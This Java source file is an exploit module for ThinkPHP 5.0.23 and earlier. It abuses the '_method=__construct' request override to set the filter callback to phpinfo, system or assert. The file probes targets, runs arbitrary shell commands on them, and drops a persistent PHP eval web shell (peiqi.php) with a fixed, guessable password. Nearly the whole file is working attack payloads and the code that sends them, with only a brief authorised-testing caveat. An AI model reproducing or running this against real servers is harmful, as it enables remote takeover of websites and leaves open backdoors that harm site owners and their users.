package exploit;

import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Result;

import java.net.URLEncoder;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

// ThinkPHP <= 5.0.23 — the target must expose a method route (e.g. captcha) for these payloads to work
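/**
 * ThinkPHP &lt;= 5.0.23 remote code execution via the {@code _method=__construct}
 * request override: the request {@code filter[]} is pointed at a PHP callable
 * ({@code phpinfo}, {@code system}, {@code assert}) that is then applied to a
 * request variable the attacker controls.  Every request goes to
 * {@code /?s=captcha&amp;test=-1}, so the target must expose a method route such as
 * {@code captcha}; without one the probes simply fail.
 *
 * <p>Operator notes:
 * <ul>
 *   <li>Use only against systems you are authorised to test.
 *       {@link #exeVUL(String, String)} runs arbitrary shell commands, and
 *       {@link #getShell(String)} drops a persistent PHP backdoor ({@code peiqi.php},
 *       POST parameter {@code peiqi}) with a fixed, guessable file name and
 *       password. Anyone who finds that file can use it, so it must be removed
 *       once the engagement is over.</li>
 *   <li>Detection is heuristic: {@code checkVUL} looks for the string
 *       {@code "PHP Version"} in the response, {@code getShell} only checks for an
 *       HTTP 200 on the dropped file. A WAF, a custom error page or a catch-all
 *       200 route can yield false negatives or false positives.</li>
 *   <li>Per-payload request failures are printed to stderr and the next payload is
 *       tried; nothing else is logged.</li>
 * </ul>
 */
public class tp5023 implements BasePayload {

    /** Module name reported in {@link Result} objects from {@link #checkVUL(String)}. */
    private static final String VUL_NAME = "ThinkPHP 5.0.23 RCE";
    /** Substring of a phpinfo() page that shows the filter callback actually ran. */
    private static final String CHECK_STR = "PHP Version";
    /** File name of the dropped web shell (relative to the site root). */
    private static final String SHELL_FILE = "peiqi.php";
    /** POST parameter the dropped shell evaluates. */
    private static final String SHELL_PASS = "peiqi";

    /** Builds the probe URL; all payloads are POSTed to the {@code captcha} method route. */
    private static String payloadUrl(String url) {
        return url + "/?s=captcha&test=-1";
    }

    /**
     * Probes the target by making {@code phpinfo()} the request filter callback.
     *
     * @param url target base URL without a trailing slash
     * @return success when any of the three payload variants yields a response
     *     containing {@value #CHECK_STR}; the detail string records the exact
     *     URL and POST body that worked
     * @throws Exception never in practice — per-payload errors are caught and
     *     printed so the remaining variants are still tried
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        String target = payloadUrl(url);
        // Three spellings of the same primitive; a single hit is enough.
        List<String> probes = Arrays.asList(
                "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1",
                "_method=__ConStruct&method=get&filter[]=call_user_func&get[0]=phpinfo",
                "_method=__construct&filter[]=phpinfo&method=GET&get[]=1");
        for (String body : probes) {
            try {
                String response = HttpRequest.post(target).send(body).body();
                if (response.contains(CHECK_STR)) {
                    return new Result(true, VUL_NAME, target + " Post: " + body);
                }
            } catch (Exception e) {
                // A timeout or connection error on one variant must not abort the others.
                e.printStackTrace();
            }
        }
        return new Result(false, VUL_NAME, "");
    }

    /**
     * Runs {@code cmd} on the target through {@code filter[]=system}.
     *
     * <p>The command is URL-encoded before being placed in the form body, so
     * characters that are also form separators ({@code &amp;}, {@code =}, {@code +},
     * {@code %}, {@code #}) reach the target intact instead of splitting the
     * payload into unrelated parameters. PHP decodes the body back to the exact
     * command string.
     *
     * @param url target base URL without a trailing slash
     * @param cmd raw shell command, executed as-is on the target
     * @return a {@code Result} whose success flag only means an HTTP response was
     *     received for the first payload that did not throw — it does not prove
     *     the command ran. The detail is the response text up to the first
     *     {@code '<'} (where ThinkPHP's HTML starts), the whole response if it
     *     contains no {@code '<'} at all, or the whole response when the command
     *     produced no output before the HTML. Failure only if every payload threw.
     * @throws Exception if UTF-8 is unavailable (cannot happen on a conforming JVM)
     */
    public Result exeVUL(String url, String cmd) throws Exception {
        String target = payloadUrl(url);
        String encodedCmd = URLEncoder.encode(cmd, "UTF-8");
        List<String> payloads = Arrays.asList(
                "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=" + encodedCmd,
                "s=" + encodedCmd + "&_method=__construct&method=get&filter[]=system",
                "s=" + encodedCmd + "&_method=__construct&method&filter[]=system");
        for (String body : payloads) {
            try {
                String response = HttpRequest.post(target).send(body).body();
                int htmlStart = response.indexOf('<');
                // Previously substring(0, -1) threw here when the response had no '<',
                // which silently discarded a perfectly good command output.
                String output = htmlStart < 0 ? response : response.substring(0, htmlStart);
                if (output.isEmpty()) {
                    return new Result(true, "", response);
                }
                return new Result(true, "", output);
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }

    /**
     * Writes a one-line {@code eval($_POST[...])} web shell to the site root.
     *
     * <p>Two variants go through {@code system} (shell {@code echo >>}) and two
     * through {@code assert} ({@code file_put_contents} / {@code copy}), so one of
     * them may succeed even when the web user cannot spawn processes.
     *
     * <p>NOTE(review): in the two shell variants the single quotes around
     * {@code 'peiqi'} close and reopen the outer {@code echo '...'} quoting, so the
     * written file contains the bare word {@code $_POST[peiqi]}. That is tolerated
     * on PHP 5/7 (undefined constant falls back to a string) but is a fatal Error
     * on PHP 8 — confirm the target's PHP version before relying on those two.
     *
     * @param url target base URL without a trailing slash
     * @return success with the shell URL and password when a GET on the dropped
     *     file returns HTTP 200 after any payload; the 200 check is a heuristic
     *     and a catch-all route or a 200 error page will also satisfy it
     * @throws Exception never in practice — per-payload errors are caught and printed
     */
    @Override
    public Result getShell(String url) throws Exception {
        String target = payloadUrl(url);
        String shellUrl = url + "/" + SHELL_FILE;
        List<String> payloads = Arrays.asList(
                "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php",
                "_method=__construct&filter[]=system&method=GET&get[]=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php",
                "_method=__construct&filter[]=assert&method=GET&get[]=file_put_contents('./peiqi.php','<?php%20@eval($_POST[%27peiqi%27])?>');",
                "_method=__construct&filter[]=assert&method=GET&get[]=copy('<?php%20@eval($_POST[%27peiqi%27])?>', './peiqi.php');");
        for (String body : payloads) {
            try {
                // body() is what actually executes the request; the response itself
                // is not informative for a write, so it is discarded.
                HttpRequest.post(target).send(body).body();
                if (HttpRequest.get(shellUrl).code() == 200) {
                    return new Result(true, null, shellUrl + "   Pass:" + SHELL_PASS);
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }
}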
